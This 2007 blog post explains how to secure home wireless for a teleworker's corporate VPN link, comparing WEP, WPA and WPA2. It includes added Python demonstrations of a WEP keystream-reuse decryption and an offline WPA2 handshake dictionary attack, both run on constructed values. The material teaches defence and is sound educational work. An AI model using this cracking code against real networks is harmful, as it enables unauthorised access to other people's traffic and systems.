Monday, March 5, 2007

Teleworker- Wireless

Nowadays, people expect wireless connections wherever they go: hotel rooms, airports, coffee shops, and even parks. Many corporations are incorporating wireless into their network designs as well, not only in conference rooms but pervasively, throughout the entire building or campus. Enterprise wireless is very different from the wireless router one might have at home, but both operate on some of the same principles. Users want the comfort of surfing the web or doing work from the couch, the bedroom, or even the backyard. Leo has explained how the teleworker setup lets a user connect securely from home into corporate headquarters using VPN and NAC, and how to extend it by adding an IP phone to the mix; wireless lets that user reach the office from anywhere in the house. However, because this data is transmitted without the physical protection of wires, we must be aware of the security holes in the technology and how they can compromise the secure connections we have made into the corporate network. Leo has explained both IPsec and SSL VPNs, the VPN software client, and the option of a hardware VPN box to off-load the processing from your machine.

Let us start with the easy scenario: a home machine connected to your home router. When you start the software VPN client, you may notice that you can no longer reach your home router to make administrative changes or access anything else on your local network. This is because, as Leo mentioned earlier, the VPN client places you directly on the corporate network and sends all of your traffic through the tunnel (no split tunneling), bypassing your local network resources. There is no need to worry about the wireless link in this case: everything between your machine and the corporate VPN gateway is already encrypted inside the tunnel, so the wireless network only ever carries ciphertext. The one caveat is that this holds only while the client is connected; before the tunnel comes up, anything your machine sends crosses the air with whatever protection the wireless network itself provides.

With a VPN appliance, things get a little trickier. Let us assume that you have decided on a VPN hardware solution and have a permanent connection to your corporate network, but you do not want to be tied to an Ethernet cable plugged into the switchports on the back of the box. How can we add wireless to this connection? Some appliances, like the Cisco 850 series wireless ISR router, come with wireless built in, but even then the wireless side still has to be secured. If like me, you use an appliance that does not have integrated wireless, you can add a wireless access point to one of the ports and then associate to that. A word of caution: either way, with integrated wireless or not, your system is only as secure as its weakest link. Out of the box, with no security settings in place, a wireless network is wide open and anyone within radio range can join it. If someone associates to your access point and that access point sits on the LAN side of your VPN appliance, they are inside the tunnel and have the same access to your corporate network that you do.

So what can we do to mitigate this? Two things matter: encryption and authentication. We will cover authentication in detail when we discuss enterprise wireless; for home use, encryption (and the shared secret it is built on) is the more important of the two. Encryption does for the wireless link what the VPN tunnel does for the Internet path: it scrambles the data so that anyone who captures it off the air cannot read it. The options are WEP, WPA and WPA2. Let's take a high-level view of each one.

WEP is the oldest of the three and has only rudimentary authentication built in. It is no longer considered viable, for enterprise or home use, because it is easy to crack. The reason is that WEP's per-packet RC4 key is formed by prepending a 24-bit initialization vector (IV) to the shared key, and that IV is sent in the clear in front of every frame. With only about 16 million possible IVs, a busy network repeats them; two frames encrypted under the same IV share the same keystream, so knowing the contents of one reveals the other. Worse, weaknesses in how RC4 expands that (IV, key) pair let an attacker recover the shared key itself from a large enough capture, and freely available tools have automated this for years.
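The keystream-reuse problem described above, as an added example that is not part of the original post. It implements plain RC4 and the WEP framing (cleartext IV, RC4 keyed with IV || key; the ICV is omitted for brevity), then plays the attacker: one frame whose payload is known (for instance a packet the attacker sent to the LAN from the Internet) yields the keystream for that IV, and a second frame that reuses the IV decrypts with a XOR. The shared key, the IV and both payloads are constructed values; the attacker code never touches the key.

```python
# Added example (not from the original post): why WEP's cleartext IV is fatal.
# All keys, IVs and frame payloads below are constructed for the demonstration.
from __future__ import annotations

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: the 24-bit IV goes out in the clear, and RC4 is keyed
    with IV || shared_key.  The 4-byte ICV is omitted to keep the example short."""
    assert len(iv) == 3
    return iv + rc4(iv + shared_key, payload)

def keystream_from_known_plaintext(frame: bytes, known_payload: bytes) -> tuple[bytes, bytes]:
    """Attacker step 1: ciphertext XOR known plaintext = keystream for that IV."""
    iv, ct = frame[:3], frame[3:]
    return iv, bytes(c ^ p for c, p in zip(ct, known_payload))

def decrypt_with_reused_iv(frame: bytes, keystreams: dict[bytes, bytes]) -> bytes | None:
    """Attacker step 2: any later frame carrying an IV we already have a keystream
    for decrypts with a XOR; the shared key is never needed."""
    iv, ct = frame[:3], frame[3:]
    ks = keystreams.get(iv)
    if ks is None or len(ks) < len(ct):
        return None
    return bytes(c ^ k for c, k in zip(ct, ks))

LLC_SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"   # first 8 bytes of every IP frame over 802.11

def demo() -> bytes | None:
    shared_key = b"\x1f\x2e\x3d\x4c\x5b"   # constructed 40-bit WEP key, known only to AP and clients
    iv = b"\x00\x00\x2a"                   # 24-bit IV: only 2**24 values, so repeats are routine
    # Frame 1: the attacker knows its payload (a packet they caused to be sent onto the LAN)
    known_payload = LLC_SNAP_IP + b"PING PING PING PING PING"
    frame1 = wep_encrypt(shared_key, iv, known_payload)
    # Frame 2: a victim's frame that happens to reuse the same IV
    secret_payload = LLC_SNAP_IP + b"GET /payroll HTTP/1.1".ljust(24)
    frame2 = wep_encrypt(shared_key, iv, secret_payload)
    # Passive attacker: sees both frames on the air, never sees shared_key
    seen_iv, ks = keystream_from_known_plaintext(frame1, known_payload)
    return decrypt_with_reused_iv(frame2, {seen_iv: ks})

if __name__ == "__main__":
    print(demo())
```

Because every data frame begins with the same LLC/SNAP header, the first eight bytes of keystream are recoverable for every IV even without an injected packet, which is why WEP capture tools build up IV-to-keystream tables so quickly on a busy network.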

WPA and WPA2 share the same framework (the same pre-shared-key setup and the same handshake), but they differ in the cipher: WPA encrypts with TKIP, an RC4-based stopgap designed to run on WEP-era hardware, while WPA2 uses the much stronger AES (in CCMP mode). There are no practical attacks on AES, and at the time of writing none on TKIP either, so both are far stronger than WEP. Use WPA2 whenever you can; it generally requires hardware and drivers from 2004 or later plus an operating-system update (Windows XP SP2 needs a separate WPA2 update), whereas WPA with TKIP works on any machine running Windows XP SP2.

To implement WPA or WPA2 at home, choose a passphrase and enter it in the access point's menu and on each computer. The passphrase itself is never transmitted. Both sides run it through a slow, salted hash (PBKDF2, with the network name as the salt) to derive a 256-bit pre-shared key, and then a four-way handshake, using a fresh random number from each side, proves that both hold the same key and derives new per-session keys; if the handshake checks out, the process is complete. This is why WPA is so much stronger than WEP: the keys that actually encrypt data change every session and never depend on a short value sent in the clear. The one thing it does not protect against is a weak passphrase. The handshake can be captured off the air and candidate passphrases tested against it offline, so a dictionary word will eventually fall; use a long, random passphrase (the standard allows 8 to 63 characters) that no one could guess.
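The derivation and the offline-guessing caveat described above, as an added example that is not part of the original post. It derives the pre-shared key exactly as 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), expands it to the session key using both MAC addresses and both handshake nonces, and computes the WPA2 handshake MIC over a minimal EAPOL-Key message 2. `demo()` then acts as the attacker: given only what was sniffed (SSID, MACs, nonces, the frame and its MIC), it tries a wordlist. The SSID `homewifi`, the MAC addresses, the nonces and the wordlist are all constructed values.

```python
# Added example (not from the original post): how the WPA/WPA2 pre-shared key is
# derived, and why a captured four-way handshake lets a weak passphrase be guessed
# offline.  SSID, MACs, nonces and wordlist are constructed, not captured.
from __future__ import annotations
import hashlib
import hmac

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds) -> 256-bit PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, n_bytes: int) -> bytes:
    """802.11i PRF-n: concat of HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    for i in range((n_bytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:n_bytes]

def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key: PMK expanded over both MACs and both nonces.
    The first 16 bytes are the KCK, which keys the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)

def eapol_key_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key frame (handshake message 2) with the MIC field zeroed;
    the MIC is computed over the whole frame in exactly this form."""
    body = (b"\x02"                              # descriptor type: RSN
            + b"\x01\x0a"                        # key info: HMAC-SHA1 MIC, pairwise, MIC present
            + b"\x00\x10"                        # key length: 16 bytes (CCMP)
            + (1).to_bytes(8, "big")             # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)    # key IV, key RSC, key ID
            + bytes(16)                          # MIC placeholder
            + b"\x00\x00")                       # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]

def recover_passphrase(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                       snonce: bytes, frame: bytes, mic: bytes, candidates) -> str | None:
    """Offline dictionary attack: everything it needs is in the captured handshake."""
    for cand in candidates:
        kck = wpa_ptk(wpa_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return cand
    return None

def demo(real_passphrase: str) -> str | None:
    """Legitimate client builds message 2; attacker sniffs it and guesses."""
    ssid = "homewifi"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"ap nonce").digest()        # stand-ins for the random nonces
    snonce = hashlib.sha256(b"client nonce").digest()
    kck = wpa_ptk(wpa_pmk(real_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = eapol_key_msg2(snonce)
    mic = eapol_mic(kck, frame)
    wordlist = ["password", "letmein", "homewifi", "password123", "qwerty"]
    return recover_passphrase(ssid, ap_mac, sta_mac, anonce, snonce, frame, mic, wordlist)

if __name__ == "__main__":
    print(demo("password123"))
    print(demo("Qk7!vR2pLw9#mZ4xTe8"))
```

The 4096 PBKDF2 rounds are what make each guess cost something (on a 2007-era CPU, hundreds of guesses per second; far more on modern hardware), but they only slow the attacker down; a passphrase that appears in a wordlist is found, and one with enough random characters is not.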

There are many more security measures that can enhance the protection of your wireless network, as well as more robust features for business. However, by simply enabling WPA or WPA2 on your access point with a strong passphrase, you close the wireless hole and can connect securely to your corporate network from anywhere in your home.
